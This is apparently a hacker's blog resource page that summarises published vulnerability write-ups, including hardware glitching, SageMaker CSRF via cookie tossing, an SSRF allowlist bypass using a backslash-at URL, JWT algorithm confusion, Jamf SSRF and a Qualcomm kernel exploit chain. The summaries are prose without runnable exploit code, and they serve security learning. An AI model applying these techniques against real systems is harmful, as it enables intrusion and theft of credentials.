Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Renes'hack- 693

CollShade    Reference →Posted 4 Years Ago
  • The author was working with a device that had the Renesas RX65 chip on it. The author wanted to see the contents of firmware. Alas, the chip had a write programmer lock on it. The author needed a 16 byte ID code that they clearly did not have. Additionally, all of the protocols for communication were proprietary. This looks like a challenge to me if I've ever seen one!
  • Three interfaces for firmware operations appeared in the docs: USB, FINE and SCI. FINE is a proprietary interface used by Renesas and is not documented. USB is also not documented, so the easiest option is to use the serial interface. The Serial protocol had a limit on the amount of ID codes and USB was not exposed on the device. So, the best option was FINE.
  • By reading schematics and datasheets, the author found out that FINE was a single wire interface. Using the Renesas Flash programmer on a dev board allows us to see the traffic being sent. Here's the problem though: this did not allow for us to discriminate the host and device communication.
  • In order to fix this problem, the author added a small resistor small resistor on the OCD side, which is a divider. When the MCU pulls the line low, the voltage at the center point (ADC) is 0V. However, when OCD pulls the line LOW there is a small voltage (about 200mV) at the center point. This allowed for the differentiating between the two lines of communication and better reversing of the protocol.
  • Even with this amazing setup and some reversing, a friend of the author noted that the SCI protocol looked quite similar to the FINE protocol (which is well documented in the manual). There are some notes on the two protocols but the author leaves the rest of this reversing for someone else to do.
  • How can the ID check be bypassed? Glitching! If we can change the path that the code running hits by physically altering the device, then we can access the programming mode. In this case, the goal was to glitch the power supply of the MCU right after sending the Serial Programming ID Code Check Command, which was in FINE.
  • To set this up properly, the author removed every capacitor on VCC to create a direct connection to the Core power supply. This makes the voltage and current actually glitch the system instead of their normal smoothing operation. To setup the glitching, this is what the author did:
    1. Run the initialization sequence of FINE until the ID Check is sent.
    2. Send the command to the MCU. This is where our timer for the glitch starts.
    3. Glitch the system at a set interval.
    4. Loop over the position 50 times. Increase the timer if this does not work.
  • After running this for a very long time, the programmer works to extract the Flash! Glitching is extremely powerful but complicated to setup. The author submitted the CVE 2021-43327 for this vulnerability on the chip is well. Interesting bypass and it's real cool to see a real setup of glitching.

Jupyter Notework Instance Takeover- 692

Gafnit Amiga - Lightspin    Reference →Posted 4 Years Ago
  • Amazon SageMaker is a fully managed machine learning service hosted on AWS. With SageMaker, data scientists and developers can quickly and easily build and train machine learning models, and then directly deploy them into a production-ready hosted environment.
  • While looking at the source code of the website via view-source:, they noticed an interesting file path being used for the environment. This directory called home/ec2-user/anaconda3/envs/JupyterSystemEnv/share/jupyter/lab/static had several HTML, JavaScript and CSS files inside of it. By modifying the HTML page, the author trivially achieved XSS! But here is the thing: this was a self-XSS. What can we really do with that?
  • Since all domains are of the form <my_instance><region>.sagemaker.aws, self XSS could potentially be escalated away from the hosted instance. They noticed that all of the cookies were scoped to ONLY .sagemaker.aws! In particular, the anti-csrf token was on this domain.
  • The author thought to use an attack that I had never considered before: cookie tossing. This is when an attacker can set a cookie on the domain that is used for critical actions. In the case of our XSS, we can do exactly that on our domain.
  • Sagemaker used the double submit CSRF protection. This works by sending the CSRF token in a cookie and the other one as a header or a field in the request. Since the attacker cannot normally see the CSRF token cookie, this works quite well. However, in this case, the cookie tossing issue allows us to specify the cookie CSRF token! This means that the double submit method has been compromised since we can control both values being sent.
  • There are a couple of other things to consider with CSRF though: origin validation, non-safe request issues and the Same-Site cookie flag. The origin validation was non-existent, so this part was fine. In the land of browsers, CORS becomes a major problem for CSRF attacks because of pre-flight OPTIONS request is made. As a result, only certain types of request, known as simple can be used. This disallows us from setting custom headers, using JSON and any non GET/POST request.
  • The application puts the CSRF token into a header. However, the author figured out that this could be included as a GET parameter and the request would still work! One more problem though: the request being made was a JSON request. The trick was to send the data as the Content-Type to plain/text in order to get the JSON to be sent but still interpreted as JSON! That's a new trick for me.
  • The final CSRF mitigation problem is the SameSite cookie flag. There are three settings for this: none, lax and strict. The default in Chrome and Firefox is lax, but the default in Safari is none. When the setting is lax, some cross-domain requests are allowed, such as GET requests to the top level domains. strict will never send cookies from cross-domain requests.
  • In Chrome, if the SameSite attribute is never set (defaults to lax), then there is a 2 minute grace period where all requests will contain the cookies. So, the author figured out a GET request (which does not get affected by SameSite with the lax setting) to reset the Authtoken of the user! Since the cookie was now set less than 2 minutes ago, the auth cookie will be used. Damn, that is a real fancy workaround!
  • With the CSRF protections defeated, an extension can be added to a notework to execute code in there. Now, the access tokens for the role can be stolen, leading to much more damage being caused.
  • I learned a few new tricks with this. First, cookie tossing makes sense and is a large weakness with the double submit CSRF protection. Second, the plain/text simple request and setting the csrf value as a parameter. Finally, the trick for resetting the auth token was really awesome to abuse the Chrome grace period on the SameSite cookie header. Overall, a crazy article about how a self-XSS lead to a compromise.

URL whitelist bypass in https://cxl-services.appspot.com- 691

David Schutz    Reference →Posted 4 Years Ago
  • An internal GCP project called cxl-services is used for internal requests within some other service. The author does not give a description of what it does at all.
  • The application has an allowlist for the domains that can be called internally using this service. When validating the URL, the parser falls for the '\@' trick, which even the original RFC gets wrong.
  • The issue is that https://[your_domain]\@jobs.googleapis.com thinks the authority is jobs.googleapis.com but the library making the request makes the request to [your_domain] with a path of /@jobs.googleapis.com. Hence, the verification differing from the usage causes the vulnerability.
  • Why does this SSRF cause a problem? Most of the time, the attacker gets access to an internal network. In this case, an authorization token for App Engine is in the request, which is now leaked to us.
  • With the access token in hand, the author wanted to demonstrate impact without jeopardizing the company. They found a few other projects that the authorization token had access to (docai-demo, p-jobs, garage-stating, etc.). They took rigorous notes on the requests they made, in order to help Google with incident response.
  • The patch for the bug was pretty terrible: block all usage of '\@' next to each other. So, adding anything between these (such the URL https://[your_domain]\_@jobs.googleapis.com) still caused the SSRF. After fixing this, they found ANOTHER issue. There are still old vulnerable versions of the AppEngine app running, which needed to be patched.
  • Overall, interesting bug and a trick that I did not know about! Verification corresponding to actual usage is hard to do properly. Additionally, lots of bugs are not fixed properly the first time!

Authentication Bypass when using JWT w/ public keys- 690

Plokta - HackerOne    Reference →Posted 4 Years Ago
  • JSON web tokens (JWTs) are a common way to create session tokens. They contain three main fields: header, data and a signature. The header is information about the token, the data is the important information about the user and the signature is a cryptographic algorithm to demonstrate that the JWT has not been tampered with.
  • JWTs can use both asymmetric and symmetric algorithms for the signature. The asymmetric version, such as RSA, is more commonly used because the public key can be used to verify the signature without knowing the public key. This makes it possible to be used on other sites besides the one that generated it!
  • The header is a base64 encoded JSON blob that contains several elements but only one that we are interested in: alg, which is short for algorithm for the signature. For instance, this could be set to RS256 for RSA or HS256 for HMAC.
  • So, if the user can specify the algorithm, which key is used? And this is where the vulnerability occurs at! If the algorithm set by the user is used without validation and the input is expecting an asymmetric encryption algorithm, problems occur.
  • With RSA, a public key is used in order to verify the signature. So, this would be the key used for the input. But, if we select a symmetric encryption algorithm, such as HMAC, this will be used as the secret key.
  • This is where the magic lies: the public key is public! By selecting a symmetric key algorithm, such as HMAC, we can sign the JWT with the public key. Since this is the input into the signature validator, it will blindly think that the RSA or asymmetric public key is the secret. Now, we can sign arbitrary objects!
  • This is the issue that happens in Jitsi, which is an open source product that is similar to Zoom. When looking around to the NodeJS jsonwebtoken for if this would be possible, it turns out that it is if the algorithm could be set. Otherwise, the algorithm is assumed based upon the content of the secret.
  • Interesting bug that probably exists in other places. JWTs are awesome but have many foot-guns inside of them.

Stored XSS via Mermaid Prototype Pollution vulnerability- 689

Misha98857 - HackerOne    Reference →Posted 4 Years Ago
  • Prototype pollution is about poisoning the main JavaScript object to overwrite variables or functions that will then be inherited by other objects later. This vulnerability is in Gitlabs Mermaid, which is there custom markdown language.
  • When creating a diagram in Mermaid, JSON can be specified in the initialization process. This JSON is then merged or copied in some way (does not say explicitly), which creates a prototype pollution vulnerability.
  • In order to exploit this, they specify a field called template with JavaScript. Later on, this input gets executed when clicking on the search bar. XSS!
  • The author of this had an additional prototype pollution is Gitlab as well. In this article, they mention the cause: "Behind the scenes, library takes JSON_OBJECT from directive and merges it with config object. Later that config is used to generate new CSS rules..."
  • The solution for this is a denylist of attributes being written that contains __proto__ and a few other items. I hate this solution; if another way is found to reference prototype, then it's a large list of findings.

This shouldn't have happened: A vulnerability postmortem - 688

Tavis Ormandy - Project Zero (P0)    Reference →Posted 4 Years Ago
  • The author of this post found an extremely straight forward bug that has been around for quite some time! The first part of the article explains the bug, then the author dives into why this wasn't discovered and how we can find these types of bugs in the future.
  • Network Security Services (NSS) is a cryptographic library that is maintained by Mozilla. When you verify an ASN.1 encoded digital signature, NSS will create a VFYContext structure to store the necessary data. This includes things like the public key, the hash algorithm, and the digital signature.
  • In this implementation, the RSA signature has a maximum size of 2048 bytes which is 16384 bits. What happens if you use something bigger than this? Memory corruption! An attacker controls the data and the size that gets put into a memcpy for a fixed sized buffer.
  • The bug is fairly straight forward; copying data into a fixed size buffer without any sanity checks. The author then asks "How did this slip through the cracks?" Mozilla does nightly fuzzing of this library, ASAN could have detected this easily, lots of people look over the code... so, what went wrong? The author has three points for this.
  • The author of this post actually found the bug through fuzzing. They were experimenting with a different coverage method than block coverage. One of these was stack coverage, which monitoring the stack during execution to find different paths this way. The other way was object isolation, which is a way to randomly permute templated data,
  • First, the library is missing end-to-end testing. NSS is a modular library, meaning that each component is fuzzed individually. For instance, QuickDER is tested ONLY by creating and deleting objects, but never actually uses them. Since the buggy code only happened when verifying a signature, the fuzzer would have never caught it.
  • Another issue is that fuzzers typically cap themselves on the size of inputs in order to be faster and get coverage quicker. In the case of this library, the size cap was 10,000 bytes. However, these limits are arbitrary and may lead to missed findings, as lots of vulnerabilities occur at the extremes.
  • All of the NSS fuzzers are represented in combined coverage metrics by oss-fuzz instead of individual coverage. This data was misleading, as the vulnerable code is fuzzed extensively but by fuzzers that could not possibly generate a relevant input. This is because the testing uses hardcoded certificates, which is where this code was at.
  • Overall, the bug was really simple. The analysis of why such a simple bug lived so long in the code base was fascinating. To team, it means getting as much real coverage as possible and leading the randomization algorithms to its thing. Consider all of the possible cases where something could be used and ensure that the fuzzer can do this.

Discovering Full Read SSRF in Jamf - 687

Shubham Shah - AssetNote    Reference →Posted 4 Years Ago
  • Jamf is an application used by system administrators to configure and automate IT tasks. There are cloud (SaaS) and on-premise variations of the product. It is a popular MDM (mobile device management) solution for Apple products.
  • The authors were curious if they could find any server side request forgery (SSRF). To do this, they looked for HTTP clients used within Jamf. When building software, it is not uncommon to find a HTTP client wrapper that is used by the rest of the code base, which was the case here. When searching for this in the rest of the code base a bunch of other occurrences came up.
  • By going source to sync, they found all locations where URLs that were controllable by the user were making HTTP calls; this led them to 6 usages in the code. One of them was functionality to test view an image from a distribution point, which takes a user controlled URL then displays the content back to the user.
  • The result of this request is an XML page that has the image base64 encoded. However, the data does not have to be an image; it will base64 encode anything that you request! This gives the attackers the ability to make a request on the internal network and view the result of it.
  • The cloud version of this software is hosted on AWS. SSRF in an application hosted on AWS can lead to the compromise of the instance by making an HTTP call to the metadata service. A simple GET request to an internal IP will return the temporary security credentials of the environment, assuming that a role has been attached to the instance. Using this, it may have been possible to escalate deeper into the account, but the team stopped investigating and reported the bug.
  • The Jamf team monitoring noticed this strange behavior, causing alarms to sound. They banned the IP address making the request and disabled the instance where the exploit had been performed. As a temporary fix they added a WAF rule to all instances that blocked this type of request from being made.
  • Overall, good article on an impactful SSRF vulnerability and exploitation.

Fall of the machines: Exploiting the Qualcomm NPU (neural processing unit) kernel driver- 686

Man Yue Mo - Github Security Labs    Reference →Posted 4 Years Ago
  • The NPU (neural processing unit) is a co-processor on Qualcomm chips that is designed for AI and machine learning tasks. The NPU has a kernel driver that can be interacted with from user space on Samsung devices. Since this is Linux, the code is open source!
  • To interact with the driver, the file /dev/msm_npu is used. This driver has many IOTCL calls, such as allocate/unmap a DMA buffer, load/unload neural network model and several other operations. Most of the commands are synchronous with a few being asynchronous.
  • When loading an NPU model, there is a statically sized global array of contexts that are the different jobs taking place. When calling npu_close, the client pointer is removed from the network.
  • Since this information is global, all information associated with the old clients needs to be removed. By calling npu_close and async npu_exec_network at close to the same time, the client is used but the NPU is never cleaned up! This leads a use after free on a pointer in the global buffer. By replacing the client object with a fake object arbitrary kernel functions, with 1 parameter of control, can be called.
  • The next bug is very strange; it is like the code was never checked for functionality. While calling npu_exec_network_v2, stats_buf can be specified to collect some debugging information. But, this never worked? Instead of specifying the buffer address, an additional dereference was used! &kevt->reserved[0] should have been kevt->reserved[0].
  • The bug above lead to the leaking of the stats_buf address rather than the copying the contents. This allowed the attacker to learn where this buffer was in memory and partially defeat KASLR. What a stupid bug that leads to another step in the chain.
  • The author noticed that an object was being never being initialized and some of the values of it were not guaranteed to be set either. By itself, this may not lead to any interesting bugs. However, when diving into this code further, this object was being copied back into memory, making it a good option for an information leak.
  • struct npu_kevent contained a UNION with four potential elements. In C, the compiler creates a UNION with the largest of the elements for size reasons. The largest element (uint8_t data[128])is an auxiliary buffer of size 128. When the copy happens when a small UNION field is used, such as struct msm_npu_event_execute_v2_done exec_v2_done, then the rest of the data is never initialized.
  • Now, here is the best part: all of the bytes unused by the other field in the UNION will be copied over! This is because the code sizeof(struct msm_npu_event)) takes the size of the struct with the largest field in the UNION for the size. So, even though the used parts of the UNION were initialized, the rest of the buffer was not. Damn, this is an awesome bug!
  • To bring this all together, the third vulnerability can be used to defeat KASLR and all other randomness. The second bug can be used to determine the address of stats_buf, which is important for creating a fake object. The first vulnerability can then have a fake object, on the use after free, that calls a function pointer to get code execution.
  • Once code execution was achieved, the author needed to bypass control flow integrity (CFI). The goal was to call __bpf_prog_run32 with bytecode pointer that should be executed in the kernel. Since the parameters were not setup properly, they needed to find a function to control the second parameter. Moving from parameter 1 to parameter was easy because of the large occurrence of small wrappers in Linux.
  • Overall, these bugs were difficult to spot bugs that were either found by code review or accident with somebody intentionally looking for these bugs. For me, if I see a UNION or global variables being shared, I'll make sure to check out this flow. Great article!

Linux: UAF read: SO_PEERCRED and SO_PEERGROUPS race with listen() (and connect())- 685

Jann Horn    Reference →Posted 4 Years Ago
  • In the Linux programming, sockets are how network connections are made and data is sent. Finding vulnerabilities in the network stack can be catastrophic, since this can be triggered via remote access with no user interaction.
  • When sock_getsockopt handles the option SO_PEERCRED there is no lock when copying the data to userspace. Why is this bad? Because of the missing lock the object could be deleted then sent back to the user with a use after free vulnerability.
  • This race can be triggered by calls that trigger the updating of sk->sk_peer_cred. This is because the creds are replaced, then freed. If the other process/thread is accessing the structure, then a use after free vulnerability could potentially occur.
  • The proof of concept reads the peer credentials of a listening socket over and over again in one thread. Then, in the other thread, they destroy peer credentials object. If this is ran with ASAN, then a use after free vulnerability crash occurs.
  • This vulnerability could be used for an informational disclosure only for privilege escalation; no useful writes could occur. Overall, this is a straight forward missing lock on access of a variable that leads to a real bad bug.

Full key extraction of NVIDIA TSEC- 684

plutooo    Reference →Posted 4 Years Ago
  • In 2018, the Nintendo's Switch security was in a bad place. The bootrom was vulnerable to an easy to exploit buffer overflow in the USB stack. Because of this, the flow could be hijacked, the DRM checks could be completely bypassed and this was in the bootrom, the security of the Switch was completely compromised.
  • How does one fix this? The AES root keys were stolen, meaning that all previous consoles were going to be compromised forever. The T210 chip (main CPU) has a security processor that was currently not in use. By using this chip, Nintendo has fixed their secure boot and added new material!
  • A CMOS transistor has an activation voltage of 0.6-0.7V. When the chip does not have the proper voltage, the transistors act in very funny ways. The main CPU communicates with the PMIC (power management chip) to set the voltage via i2c.
  • When dropping the voltage below a certain point, the CPU starts to act in strange ways. The USB bootrom can be used to compromise the main CPU. Using this, the messages can be sent over i2c in order to set the voltage.
  • This is the perfect setup for a differential fault attack (DFA). This involves causes glitches at the exact right time in order to leak data from the system. In this case, AES-128 has 10 rounds. The idea with DFA is to ignore the first 8-9 rounds, and only focus on the last 2 rounds. If you can get 1-2 bitflips in the last two rounds, you can solve for the key, which is pretty awesome! A reference to DFA can be found here.